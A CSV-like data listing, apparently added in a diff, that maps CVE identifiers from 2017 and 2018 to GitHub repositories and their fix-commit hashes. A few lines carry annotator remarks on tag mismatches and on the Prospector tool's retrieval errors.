+CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; +CVE-2017-11428;https://github.com/onelogin/ruby-saml;None:None;False;048a544730930f86e46804387a6b6fad50d8176f,d7ce607d9f9d996e1046dde09b675c3cf0c01280,a35f7251b86aa3b7caf4a64d8a3451f925e8855c,03af9e33d2d87f4ac9a644c5b0981ded4dca0bb8; +CVE-2017-11467;https://github.com/orientechnologies/orientdb;None:None;False;200535c3183f7db88ee4526bf3316d6bdeddb68e; +CVE-2017-11503;https://github.com/PHPMailer/PHPMailer;None:None;False;dbbc1397c41de56aa3a57c8188d19a345dea5c63; commit timespamt is outside the time interval +CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;dbe0f55871a122eac75760aef511efc3a8830b88,aac3c21893cab7361f5c35c8e20341b298f6462e,90c5df80777bfec03d041740465027f83d22e27b,83060f3383ebd26add094398174f1de34cf7b7f0,058f46141e346b18dee0497ba11203cb81ecb19e; +CVE-2017-11905;https://github.com/chakra-core/ChakraCore;None:None;False;d97375c40cfd2b2376a5c4b6cd34098e1e99e1f1; +CVE-2017-11910;https://github.com/chakra-core/ChakraCore;None:None;False;40232a443c6316a58941572b0a4776b0677975ca; +CVE-2017-12098;https://github.com/sferik/rails_admin;None:None;False;44f09ed72b5e0e917a5d61bd89c48d97c494b41c; +CVE-2017-12158;https://github.com/keycloak/keycloak;None:None;False;d9ffc4fa211bbf2aae49449cb58e02b6ea8cd299,6ea9ed9be8baa7c6971cfbdabecc91555dc561d7; +CVE-2017-12159;https://github.com/keycloak/keycloak;None:None;False;9b75b603e3a5f5ba6deff13cbb45b070bf2d2239,e201f205d162d4d795d294fe065ca20f4005eef2; +CVE-2017-12160;https://github.com/keycloak/keycloak;None:None;False;fea4c54adc6a1fdafb725b89874c389d54b6d04a,96fe4608066d533cc1ff69f23339a710a60e892d; +CVE-2017-12605;https://github.com/opencv/opencv;None:None;False;999f41fb4f4aa94a0cb47256919ae8b5c29ca5f3,72d29259ca741950527c8cca7fb649030c01f658,30f7576029deb8c125ae7688dd57cfa2156a6b72,f0fb665407a1162153930de1ab5a048a4f3d60f9; +CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; +CVE-2017-12620;https://github.com/apache/opennlp;None:None;False;c2c14e9af7a519aacfde5173f641c86e17ce50ed; +CVE-2017-12622;https://github.com/apache/geode;None:None;False;db4a493efc09600bf0a9778d5274c09b23b16644; +CVE-2017-12624;https://github.com/apache/cxf;None:None;False;a2ce435cf0eedc8158d118d6d275114408d2a376,896bd961cbbb6b8569700e5b70229f78f94ad9dd,8bd915bfd7735c248ad660059c6b6ad26cdbcdf6; +CVE-2017-12629;https://github.com/apache/lucene-solr;None:None;False;926cc4d65b6d2cc40ff07f76d50ddeda947e3cc4,f9fd6e9e26224f26f1542224ce187e04c27b2681,3bba91131b5257e64b9d0a2193e1e32a145b2a23,d8000beebfb13ba0b6e754f84c760e11592d8d14; +CVE-2017-12631;https://github.com/apache/cxf-fediz;None:None;False;e7127129dbc0f4ee83985052085e185e750cebbf,48dd9b68d67c6b729376c1ce8886f52a57df6c45,ccdb12b26ff89e0a998a333e84dd84bd713ac76c; +CVE-2017-12867;https://github.com/simplesamlphp/simplesamlphp;None:None;False;608f24c2d5afd70c2af050785d2b12f878b33c68; +CVE-2017-12868;https://github.com/simplesamlphp/simplesamlphp;None:None;False;caf764cc2c9b68ac29741070ebdf133a595443f1,4bc629658e7b7d17c9ac3fe0da7dc5df71f1b85e; +CVE-2017-12871;https://github.com/simplesamlphp/simplesamlphp;None:None;False;77df6a932d46daa35e364925eb73a175010dc904; +CVE-2017-12873;https://github.com/simplesamlphp/simplesamlphp;None:None;False;a890b60438d4c8bcdcfd770361aedbbe64ad4c74,8cd71966fbd55b7fd67ca8c849eaf1df7ab42462,baba857afb874d8d6cac0fd8e976ff2859a6cd60,90dca835158495b173808273e7df127303b8b953,300d8aa48fe93706ade95be481c68e9cf2f32d1f,e2daf4ceb6e580815c3741384b3a09b85a5fc231; +CVE-2017-13098;https://github.com/bcgit/bc-java;None:None;False;a00b684465b38d722ca9a3543b8af8568e6bad5c; +CVE-2017-14063;https://github.com/AsyncHttpClient/async-http-client;None:None;False;e9f12b29725c567cdb4de98b3302a61ca9d41280,eb9e3347e45319be494db24d285a2aee4396f5d3; +CVE-2017-14136;https://github.com/opencv/opencv;None:None;False;df1a0263299d2875eb51e85351b58d354304da22,aacae2065744adb05e858d327198c7bbe7f452b0; +CVE-2017-14506;https://github.com/geminabox/geminabox;None:None;False;5464f0cebd2e82fbd9fc321d7b5053982429c055,99aaae196c4fc6ae0df28e186ca1e493ae658e02; +CVE-2017-14619;https://github.com/thorsten/phpMyFAQ;None:None;False;30b0025e19bd95ba28f4eff4d259671e7bb6bb86; +CVE-2017-14623;https://github.com/go-ldap/ldap;None:None;False;95ede1266b237bf8e9aa5dce0b3250e51bfefe66,bb09d4b178012d5af4dd3ef600c6ef2b74b639a1; +CVE-2017-14683;https://github.com/geminabox/geminabox;None:None;False;0dc203b6cef5b9f379f2ef6a24a723f852589ee2,a01c4e8b3403624109499dec75eb6ee30bd01a55; +CVE-2017-14695;https://github.com/saltstack/salt;None:None;False;80d90307b07b3703428ecbb7c8bb468e28a9ae6d,206ae23f15cb7ec95a07dee4cbe9802da84f9c42,9ba1f6112fa72627b42eed4c4eea439dce2df31c,31b38f50ebf321a1d14af0868c516a5de865f5a8; +CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;e76f02a77afb4e43b897f13d17b5bc1260b8afde; +CVE-2017-15051;https://github.com/nilsteampassnet/teampass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; +CVE-2017-15052;https://github.com/nilsteampassnet/TeamPass;None:None;False;8f2d51dd6c24f76e4f259d0df22cff9b275f2dd1; +CVE-2017-15053;https://github.com/nilsteampassnet/TeamPass;None:None;False;ef32e9c28b6ddc33cee8a25255bc8da54434af3e; +CVE-2017-15054;https://github.com/nilsteampassnet/TeamPass;None:None;False;9811c9d453da4bd1101ff7033250d1fbedf101fc; +CVE-2017-15055;https://github.com/nilsteampassnet/TeamPass;None:None;False;5f16f6bb132138ee04eb1e0debf2bdc7d7b7a15f; +CVE-2017-15103;https://github.com/heketi/heketi;None:None;False;ed6e9fdecab5994de12547e369af11d0dae18e76,787bae461b23003a4daa4d1d639016a754cf6b00; +CVE-2017-15133;https://github.com/miekg/dns;None:None;False;43913f2f4fbd7dcff930b8a809e709591e4dd79e; +CVE-2017-15278;https://github.com/nilsteampassnet/TeamPass;None:None;False;f5a765381f051fe624386866ddb1f6b5e7eb929b; +CVE-2017-15288;https://github.com/scala/scala;None:None;False;67fcf5ce4496000574676d81ed72e4a6cb9e7757,f3419fc358a8ea6e366538126279da88d4d1fb1f,0f624c5e5bdb39967e208c7c16067c3e6c903f1f,67e1437e55df6789d0883cb8846d12071de75c63,b64ad85d1cfdfff29d0836a66736d6d2b0830c0e; +CVE-2017-15612;https://github.com/lepture/mistune;None:None;False;ab8f7de8bc78c2a88f9e01522b8a3a0aa8cd9416,d6f0b6402299bf5a380e7b4e77bd80e8736630fe; +CVE-2017-15703;https://github.com/apache/nifi;None:None;False;9e2c7be7d3c6a380c5f61074d9a5a690b617c3dc; was 1.4.0.1.5.0 +CVE-2017-15720;https://github.com/apache/airflow;None:None;False;4cf904cf5a7a070bbeaf3a0e985ed2b840276015; +CVE-2017-15728;https://github.com/thorsten/phpMyFAQ;None:None;False;2d2a85b59e058869d7cbcfe2d73fed4a282f2e5b; +CVE-2017-15729;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; +CVE-2017-15730;https://github.com/thorsten/phpMyFAQ;None:None;False;cce47f94375bb0102ab4f210672231dbb854dd0d; +CVE-2017-15731;https://github.com/thorsten/phpMyFAQ;None:None;False;fadb9a70b5f7624a6926b8834d5c6001c210f09c; +CVE-2017-15733;https://github.com/thorsten/phpMyFAQ;None:None;False;ef5a66df4bcfacc7573322af33ce10c30e0bb896; +CVE-2017-15734;https://github.com/thorsten/phpMyFAQ;None:None;False;fa26c52384b010edaf60c525ae5b040f05da9f77; +CVE-2017-15735;https://github.com/thorsten/phpMyFAQ;None:None;False;867618110feb836e168435548d6c2cbb7c65eda3; +CVE-2017-15808;https://github.com/thorsten/phpMyFAQ;None:None;False;a249b4645fb86f6a9fbe5d2344ab1cbdb906b75c; +CVE-2017-15809;https://github.com/thorsten/phpMyFAQ;None:None;False;cb648f0d5690b81647dd5c9efe942ebf6cce7da9; +CVE-2017-15879;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; versions/tags do not contain the commit at all (it is a mess) +CVE-2017-15914;https://github.com/borgbackup/borg;None:None;False;75854c1243b29ec5558be6fdefe365cd438abb4c,ea0203bb0de557cd29de5ab0a0efe5f6015ca59d; +CVE-2017-15928;https://github.com/ohler55/ox;None:None;False;e4565dbc167f0d38c3f93243d7a4fcfc391cbfc8; +CVE-2017-16003;https://github.com/felixrieseberg/windows-build-tools;None:None;False;9835d33e68f2cb5e4d148e954bb3ed0221d98e90; +CVE-2017-16006;https://github.com/jonschlinkert/remarkable;None:None;False;43eaf67dd3bb4a850542ad868b59fe75409a17a7,49e24e8f2a431c095ddbb74ecb67cf1cf8f88c47,92d79a99c39a29665f7f4fabc9593f1b30924ca9,49e87b7ae2dc323d83606792a749fb207595249e; +CVE-2017-16007;https://github.com/cisco/node-jose;None:None;False;f92cffb4a0398b4b1158be98423369233282e0af; +CVE-2017-16008;https://github.com/i18next/i18next;None:None;False;34e8e13a2b64708a0aed01092e4dbfd0e5013831; +CVE-2017-16010;https://github.com/i18next/i18next;None:None;False;11f059599889d857d497aa0499355be32df0dbb6,d367309d4427c2d651b0f0b304504cf59c056cab; +CVE-2017-16013;https://github.com/hapijs/hapi;None:None;False;770cc7bad15122f796d938738b7c05b66d2f4b7f; +CVE-2017-16014;https://github.com/http-party/node-http-proxy;None:None;False;07c8d2ee6017264c3d4deac9f42ca264a3740b48; +CVE-2017-16015;https://github.com/caolan/forms;None:None;False;bc01e534a0ff863dedb2026a50bd03153bbc6a5d; +CVE-2017-16016;https://github.com/apostrophecms/sanitize-html;None:None;False;5d205a1005ba0df80e21d8c64a15bb3accdb2403; +CVE-2017-16017;https://github.com/apostrophecms/sanitize-html;None:None;False;7a1deb341b8a9cef807269a1bbcc61207752ea2b; +CVE-2017-16018;https://github.com/restify/node-restify;None:None;False;24c57cef13dced488ca698db72b851cecd687924,d3837a925727d18b03fcd55ecdd534d8a7888d4e,0af5ccab0f3cd779bd2fc30c774c4a4557cd7cc1,a015067232ad62aa035675dc63a46dce31fed3f3; +CVE-2017-16023;https://github.com/sindresorhus/decamelize;None:None;False;76d47d8de360afb574da2e34db87430ce11094e0; +CVE-2017-16025;https://github.com/hapijs/nes;None:None;False;249ba1755ed6977fbc208463c87364bf884ad655; +CVE-2017-16026;https://github.com/request/request;None:None;False;3d31d4526fa4d4e4f59b89cabe194fb671063cdb,29d81814bc16bc79cb112b4face8be6fc00061dd,8902ce12ffed9bf65b3ccc73203f0bc390f156ea; +CVE-2017-16029;https://github.com/henrytseng/hostr;None:None;False;789a00047459fd80b6f0a9701a1378a47fb73ba8; Prospector wrongly retrieves the previous tag as the same to the next one (to fix) +CVE-2017-16031;https://github.com/socketio/socket.io;None:None;False;67b4eb9abdf111dfa9be4176d1709374a2b4ded8,de1afe13172529801e1e091a471441e11ffd85a3; +CVE-2017-16042;https://github.com/tj/node-growl;None:None;False;d71177d5331c9de4658aca62e0ac921f178b0669; vulnerable tag is fixed +CVE-2017-16083;https://github.com/sandy98/node-simple-router;None:None;False;dfdd52e2e80607af433097d940b3834fd96df488; 0.10.0 tag does not exist +CVE-2017-16084;https://github.com/KoryNunn/list-n-stream;None:None;False;99b0b40b34aaedfcdf25da46bef0a06b9c47fb59; this repo has no tags +CVE-2017-16107;https://github.com/Eeems/PooledWebSocket;None:None;False;7b3b4e5c6be6d8a964296fa3c50e38dc07e9701d; +CVE-2017-16136;https://github.com/expressjs/method-override;None:None;False;4c58835a61fdf7a8e070d6f8ecd5379a961d0987; +CVE-2017-16138;https://github.com/broofa/mime;None:None;False;855d0c4b8b22e4a80b9401a81f2872058eae274d,1df903fdeb9ae7eaa048795b8d580ce2c98f40b0; +CVE-2017-16226;https://github.com/browserify/static-eval;None:None;False;c06f1b8c0a0cd1cc989c025fbb4c5776fc661c2c; +CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; +CVE-2017-16244;https://github.com/octobercms/october;None:None;False;4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0; +CVE-2017-16558;https://github.com/contao/contao;None:None;False;6b4a2711edf166c85cfd7a53fed6aea56d4f0544,501cb3cd34d61089b94e7ed78da53977bc71fc3e; +CVE-2017-16570;https://github.com/keystonejs/keystone;None:None;False;4b019b8cfcb7bea6f800609da5d07e8c8abfc80a; How? Prospector finds f08baa4fb4084b7ec9f356d313dcfd6d7d7d0f8b which is the merge commit dated 2017 while the GT has the commits +CVE-2017-16613;https://github.com/openstack-archive/swauth;None:None;False;70af7986265a3defea054c46efc82d0698917298; +CVE-2017-16615;https://github.com/thanethomson/MLAlchemy;None:None;False;bc795757febdcce430d89f9d08f75c32d6989d3c; +CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; +CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; +CVE-2017-16759;https://github.com/librenms/librenms;None:None;False;7887b2e1c7158204ac69ca43beafce66e4d3a3b4,d3094fa6578b29dc34fb5a7d0bd6deab49ecc911; +CVE-2017-16762;https://github.com/sanic-org/sanic;None:None;False;18829e648a26d947b7e441a9d7d012a24b0adf48,ae09dec05e10816b37eed425c87e193d230c5a73,afd51e0823524eec683b226a20f40d958253064f; +CVE-2017-16792;https://github.com/geminabox/geminabox;None:None;False;e7e0b16147677e9029f0b55eff6bc6dda52398d4,f8429a9e364658459add170e4ebc7a5d3b4759e7; +CVE-2017-16876;https://github.com/lepture/mistune;None:None;False;5f06d724bc05580e7f203db2d4a4905fc1127f98; +CVE-2017-16877;https://github.com/vercel/next.js;None:None;False;02fe7cf63f6265d73bdaf8bc50a4f2fb539dcd00; commit timestamp is outside the time interval +CVE-2017-16880;https://github.com/filp/whoops;None:None;False;c16791d28d1ca3139e398145f0c6565c523c291a; +CVE-2017-17042;https://github.com/lsegal/yard;None:None;False;b0217b3e30dc53d057b1682506333335975e62b4; +CVE-2017-17485;https://github.com/FasterXML/jackson-databind;None:None;False;f031f27a31625d07922bdd090664c69544200a5d,978798382ceb72229e5036aa1442943933d6d171,bb45fb16709018842f858f1a6e1118676aaa34bd,2235894210c75f624a3d0cd60bfb0434a20a18bf; +CVE-2017-17760;https://github.com/opencv/opencv;None:None;False;70d49446e99f4caf701e4b007157ef41751bfb46,7bbe1a53cfc097b82b1589f7915a2120de39274c; +CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; commit timestamp is outside the time interval +CVE-2017-17837;https://github.com/apache/deltaspike;None:None;False;72e607f3be66c30c72b32c24b44e9deaa8e54608,4e2502358526b944fc5514c206d306e97ff271bb,d95abe8c01d256da2ce0a5a88f4593138156a4e5; +CVE-2017-18076;https://github.com/omniauth/omniauth;None:None;False;71866c5264122e196847a3980c43051446a03e9b,61df4e8198b2b33600830e00eaaae0ac0c4cabec; +CVE-2017-18077;https://github.com/juliangruber/brace-expansion;None:None;False;b13381281cead487cbdbfd6a69fb097ea5e456c3,ed46e5ba619bd938e5b84835fca00eed0adc5585; +CVE-2017-18239;https://github.com/jasongoodwin/authentikat-jwt;None:None;False;2d2fa0d40ac8f2f7aa7e9b070fa1a25eee082cb0; +CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046,d4f4f77a2cfa518426178bd69d2b29dee57f770d,98805557c10ab5ff3016ed09aa2d48c49b9df40b; +CVE-2017-18367;https://github.com/seccomp/libseccomp-golang;None:None;False;06e7a29f36a34b8cf419aeb87b979ee508e58f9e; +CVE-2017-18635;https://github.com/novnc/noVNC;None:None;False;6048299a138e078aed210f163111698c8c526a13,15ce2f71eb660c03237a58a589cd8ad84aa7f20d; +CVE-2017-1000001;https://github.com/fedora-infra/fedmsg;None:None;False;5c21cf88a24fac4c15340cfd68d6d7599ad4a4a2,2bb51cd8e7b2122b04421280ecc6e2db499f1170; +CVE-2017-1000042;https://github.com/mapbox/mapbox.js;None:None;False;538d229ab6767bb4c3f3969c417f9884189c1512,275e404057b221edd276b175e0165f23595ad35a; +CVE-2017-1000056;https://github.com/kubernetes/kubernetes;None:None;False;6f9074f06945247827499b196e0c5c23af1f5c72,ec040ef2521c8a67cc44e9ed323cbf0053268798,dd7561801aa7b7f00f1556d38a14488246821d91,52f6d3fbfb339605bb54bf04c5d8f6f4adc518f6,7fef0a4f6a44ea36f166c39fdade5324eff2dd5e; +CVE-2017-1000069;https://github.com/bitly/oauth2_proxy;None:None;False;4464655276877f1951fddf238cdfeca3cbca83ef,55085d9697962668fd4e43e8e4644144fe83cd93; +CVE-2017-1000070;https://github.com/bitly/oauth2_proxy;None:None;False;86d083266b747825a05f639560141e542019cf26,289a6ccf463a425c7606178c510fc5eeb9c8b050; +CVE-2017-1000188;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; +CVE-2017-1000189;https://github.com/mde/ejs;None:None;False;49264e0037e313a0a3e033450b5c184112516d8f; +CVE-2017-1000209;https://github.com/TakahikoKawasaki/nv-websocket-client;None:None;False;a158795432699ff06568b66517db2ca9fde282b2,feb9c8302757fd279f4cfc99cbcdfb6ee709402d,fb23d30966b8abba920fa90b49201192c66f56bf; vulnerable tag is fixed +CVE-2017-1000228;https://github.com/mde/ejs;None:None;False;3d447c5a335844b25faec04b1132dbc721f9c8f6; +CVE-2017-1000246;https://github.com/IdentityPython/pysaml2;None:None;False;7323f5c20efb59424d853c822e7a26d1aa3e84aa,79d679883f0b198511ea5eeaaf53f1f625e8d938; +CVE-2017-1000248;https://github.com/redis-store/redis-store;None:None;False;ce13252c26fcc40ed4935c9abfeb0ee0761e5704,e0c1398d54a9661c8c70267c3a925ba6b192142e; +CVE-2017-1000389;https://github.com/jenkinsci/global-build-stats-plugin;None:None;False;8322b1333329f418ea89f7c3a1528b976f6a1ede; +CVE-2017-1000427;https://github.com/markedjs/marked;None:None;False;cd2f6f5b7091154c5526e79b5f3bfb4d15995a51,8f9d0b72f5606ed32057049f387161dd41c36ade; +CVE-2017-1000431;https://github.com/ezsystems/ezpublish-legacy;None:None;False;c7174295fa0b9bd81bd4af908082464b0b80f278; version is not a git tag +CVE-2017-1000433;https://github.com/IdentityPython/pysaml2;None:None;False;efe27e2f40bf1c35d847f935ba74b4b86aa90fb5,6312a41e037954850867f29d329e5007df1424a5; +CVE-2017-1000450;https://github.com/opencv/opencv;None:None;False;c58152d94ba878b2d7d76bcac59146312199b9eb,a729f985fdc23cd30f3e45909bd627bca1d53c6c,0202e527476daceec544e63068742f70d1dfe934,08a5fe3661b4cab8758e289927cfdc96c10458da,e15a56d142906aea4e7c009d28d7432c0f1cb3a1,c46521ad65bb7c8d5c55a9f696b6bd52acdd17b8; +CVE-2017-1000451;https://github.com/vvakame/fs-git;None:None;False;eb5f70efa5cfbff1ab299fa7daaa5de549243998; +CVE-2017-1000486;https://github.com/primefaces/primefaces;None:None;False;26e44eb7962cbdb6aa2f47eca0f230f3274358f0; +CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; +CVE-2017-1000491;https://github.com/rhysd/Shiba;None:None;False;e8a65b0f81eb04903eedd29500d7e1bedf249eab; +CVE-2017-1001002;https://github.com/josdejong/mathjs;None:None;False;8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90; +CVE-2017-1001003;https://github.com/josdejong/mathjs;None:None;False;a60f3c8d9dd714244aed7a5569c3dccaa3a4e761; +CVE-2017-1001004;https://github.com/josdejong/typed-function;None:None;False;6478ef4f2c3f3c2d9f2c820e2db4b4ba3425e6fe; +CVE-2017-1002150;https://github.com/fedora-infra/python-fedora;None:None;False;b27f38a67573f4c989710c9bfb726dd4c1eeb929; +CVE-2018-0737;https://github.com/openssl/openssl;None:None;False;6939eab03a6e23d2bd2c3f5e34fe1d48e542e787,54f007af94b8924a46786b34665223c127c19081,349a41da1ad88ad87825414752a8ff5fdd6a6c3f; +CVE-2018-0953;https://github.com/chakra-core/ChakraCore;None:None;False;71d7b389a8e01f1f29bff7202270f5ce1d63696a; +CVE-2018-1067;https://github.com/undertow-io/undertow;None:None;False;cc5b9bfb1a516e0102b7a2890277d1ba3132bc67,85d4478e598105fe94ac152d3e11e388374e8b86,f404cb68448c188f4d51b085b7fe4ac32bde26e0; +CVE-2018-1098;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers +CVE-2018-1099;https://github.com/etcd-io/etcd;None:None;False;a7e5790c82039945639798ae9a3289fe787f5e56; unknown tags/vers +CVE-2018-1114;https://github.com/undertow-io/undertow;None:None;False;7f22aa0090296eb00280f878e3731bb71d40f9eb,882d5884f2614944a0c2ae69bafd9d13bfc5b64a; +CVE-2018-1193;https://github.com/cloudfoundry/gorouter;None:None;False;6734f35425ce1525660f7b231e030f2660eaf668,11d9b6ebcd319bb25b0e4ceb0b7628381a283785; +CVE-2018-1196;https://github.com/spring-projects/spring-boot;None:None;False;9b8cb9a4639af3b47b5eeec4f5a04261dcd2a058; +CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;65da28e4bf62f58fb130ba727cbbd621b44a36d1,0eef5b4b425ab42b9fa0fde1a3f36a37b92558f2,cb8041ba67635edafcc934498ef82707157fd22a; +CVE-2018-1259;https://github.com/spring-projects/spring-data-commons;None:None;False;b8974a292ab463a304eda987632be4d9c145f5f8,11d0aa1b396d8819a5a0d4933c5cfc72fe9ad102,fd94d3145d6cd2c41b07cdc76d6aa84319c1ad4d; +CVE-2018-1260;https://github.com/spring-projects/spring-security-oauth;None:None;False;70e5ba84ca98b7ab42c1900bdd9fa51b393d611f; +CVE-2018-1261;https://github.com/spring-projects/spring-integration-extensions;None:None;False;a5573eb232ff85199ff9bb28993df715d9a19a25; +CVE-2018-1263;https://github.com/spring-projects/spring-integration-extensions;None:None;False;d10f537283d90eabd28af57ac97f860a3913bf9b; +CVE-2018-1272;https://github.com/spring-projects/spring-framework;None:None;False;ab2410c754b67902f002bfcc0c3895bd7772d39f,e02ff3a0da50744b0980d5d665fd242eedea7675; +CVE-2018-1273;https://github.com/spring-projects/spring-data-commons;None:None;False;08d748a6fd0173a8ba0aa1f240c38afbdaf4ad9f,b1a20ae1e82a63f99b3afc6f2aaedb3bf4dc432a,ae1dd2741ce06d44a0966ecbd6f47beabde2b653; +CVE-2018-1274;https://github.com/spring-projects/spring-data-commons;None:None;False;06b0dab536963da78dadf2ba407e5937d81c348a,371f6590c509c72f8e600f3d05e110941607fbad,3d8576fe4e4e71c23b9e6796b32fd56e51182ee0; +CVE-2018-1284;https://github.com/apache/hive;None:None;False;cbcd846b7dee541595ceebdfb8ae367c11b1e666,f80a38ae1174553022deae4f8774918401d9756d,b0a58d245875dc1b3ac58a7cf1a61d3b17805e96; +CVE-2018-1304;https://github.com/apache/tomcat;None:None;False;723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd,2d69fde135302e8cff984bb2131ec69f2e396964,5af7c13cff7cc8366c5997418e820989fabb8f48; +CVE-2018-1309;https://github.com/apache/nifi;None:None;False;28067a29fd13cdf8e21b440fc65c6dd67872522f; +CVE-2018-1314;https://github.com/apache/hive;None:None;False;c39b5d1bc3011cf900db4e7911232c1d0fb7f576,3b1d4fdfdfecbf162b60ec0e49a07595a8a51e79; commit timestamp is outside the time interval +CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; +CVE-2018-1336;https://github.com/apache/tomcat;None:None;False;92cd494555598e99dd691712e8ee426a2f9c2e93; +CVE-2018-1339;https://github.com/apache/tika;None:None;False;1b6ca3685c196cfd89f5f95c19cc919ce10c5aff,ffb48dd29d0c2009490caefda75e5b57c7958c51; +CVE-2018-3711;https://github.com/fastify/fastify;None:None;False;7f2b88f7f523698b8bf258f8235c400af4532097,fabd2a011f2ffbb877394abe699f549513ffbd76,c42fd308d82aa57eb15a41d7dd60a2351302c64a,79edc6b8b726bcc2d394fc83479f14e9c5c10b34; +CVE-2018-3712;https://github.com/vercel/serve;None:None;False;6adad6881c61991da61ebc857857c53409544575; +CVE-2018-3714;https://github.com/nim579/node-srv;None:None;False;15be996c0520ac6e4dee0cf0808fc7e72effd2a2; +CVE-2018-3715;https://github.com/jarofghosts/glance;None:None;False;8cfd88e44ebd3f07e3a2eaf376a3e758b6c4ca19; +CVE-2018-3721;https://github.com/lodash/lodash;None:None;False;d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a; +CVE-2018-3726;https://github.com/omphalos/crud-file-server;None:None;False;4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa; +CVE-2018-3728;https://github.com/hapijs/hoek;None:None;False;32ed5c9413321fbc37da5ca81a7cbab693786dee,5aed1a8c4a3d55722d1c799f2368857bf418d6df,623667e4ed606841137af84173c588667c8e882d; +CVE-2018-3731;https://github.com/tnantoka/public;None:None;False;eae8ad8017b260f8667ded5e12801bd72b877af2; this repo has no tag, +CVE-2018-3732;https://github.com/pillarjs/resolve-path;None:None;False;fe5b8052cafd35fcdafe9210e100e9050b37d2a0; +CVE-2018-3733;https://github.com/omphalos/crud-file-server;None:None;False;4fc3b404f718abb789f4ce4272c39c7a138c7a82; +CVE-2018-3738;https://github.com/protobufjs/protobuf.js;None:None;False;2ee1028d631a328e152d7e09f2a0e0c5c83dc2aa; +CVE-2018-3740;https://github.com/rgrove/sanitize;None:None;False;01629a162e448a83d901456d0ba8b65f3b03d46e; +CVE-2018-3741;https://github.com/rails/rails-html-sanitizer;None:None;False;f3ba1a839a35f2ba7f941c15e239a1cb379d56ae; +CVE-2018-3743;https://github.com/herber/hekto;None:None;False;408dd526e706246e2c2f378580c66036b768520e,1e5c75f8259ba0daf9b2600db3c246cda1934c46; +CVE-2018-3750;https://github.com/unclechu/node-deep-extend;None:None;False;9423fae877e2ab6b4aecc4db79a0ed63039d4703; +CVE-2018-3757;https://github.com/roest01/node-pdf-image;None:None;False;54679496a89738443917608c2bbe2f6e5dd20e83,15c13846a966c8513e30aff58471163a872b3b6d; +CVE-2018-3758;https://github.com/mrvautin/expressCart;None:None;False;65b18cfe426fa217aa6ada1d4162891883137893; +CVE-2018-3759;https://github.com/jtdowney/private_address_check;None:None;False;4068228187db87fea7577f7020099399772bb147; +CVE-2018-3769;https://github.com/ruby-grape/grape;None:None;False;6876b71efc7b03f7ce1be3f075eaa4e7e6de19af; +CVE-2018-3774;https://github.com/unshiftio/url-parse;None:None;False;53b1794e54d0711ceb52505e0f74145270570d5a; +CVE-2018-3777;https://github.com/restforce/restforce;None:None;False;fd31f1cb09d8363a27e6786ba1754941a1980eed,9765e0dd9b0e5408b4390aa51962641731d282d5; +CVE-2018-3778;https://github.com/moscajs/aedes;None:None;False;ffbc1702bb24b596afbb96407cc6db234a4044a8; fixed version is vulnerable (changed) +CVE-2018-3786;https://github.com/eggjs/egg-scripts;None:None;False;b98fd03d1e3aaed68004b881f0b3d42fe47341dd; +CVE-2018-5773;https://github.com/trentm/python-markdown2;None:None;False;1fb702d650d35f7a6fee7f8dbe819e53ceaff53e,c86fce76472a8bb0b94f5396b3ca8db7d3591bcd,1b1dcdd727c0ef03453b9f5ef5ae3679f1d72323,9fc2a371d174b4f253c6b8985eedd41ce90e42f0; +CVE-2018-5968;https://github.com/FasterXML/jackson-databind;None:None;False;038b471e2efde2e8f96b4e0be958d3e5a1ff1d05; +CVE-2018-6333;https://github.com/facebookarchive/nuclide;None:None;False;65f6bbd683404be1bb569b8d1be84b5d4c74a324; +CVE-2018-6341;https://github.com/facebook/react;None:None;False;5b19684fc3eddb44a790f31804707de9234147c7,ff41519ec2fea37643ecae7f87f8e15856247faf; +CVE-2018-6517;https://github.com/puppetlabs/chloride;None:None;False;592b5730dd910a4eae7abf8c94f1a2d990411074,0c70420f3e6133ecaaa9bb9cb079dc55cacd8d17; +CVE-2018-6591;https://github.com/conversejs/converse.js;None:None;False;ba09996998df38a5eb76903457fbb1077caabe25; +CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691b,db586ede1fbb41dce21310ea28ae15a1cf1286c5; +CVE-2018-6873;https://github.com/auth0/auth0.js;None:None;False;c9c5bd414324fbab071aaa29dcc11af4ca73181b; vulnerable tag is fixed +CVE-2018-7212;https://github.com/sinatra/sinatra;None:None;False;6bcc6c3499b0fae52900ae31e63676a22d4e6a72,d17aa95f5056c52daf5d7c3170fbfd831dc96381,ba7af51bd713267910078d055d01469e836fd64f; advisory links the wrong commit +CVE-2018-7260;https://github.com/phpmyadmin/composer;None:None;False;d2886a3e8745e8845633ae8a0054b5ee4d8babd5; +CVE-2018-7408;https://github.com/npm/npm;None:None;False;74e149da6efe6ed89477faa81fef08eee7999ad0; 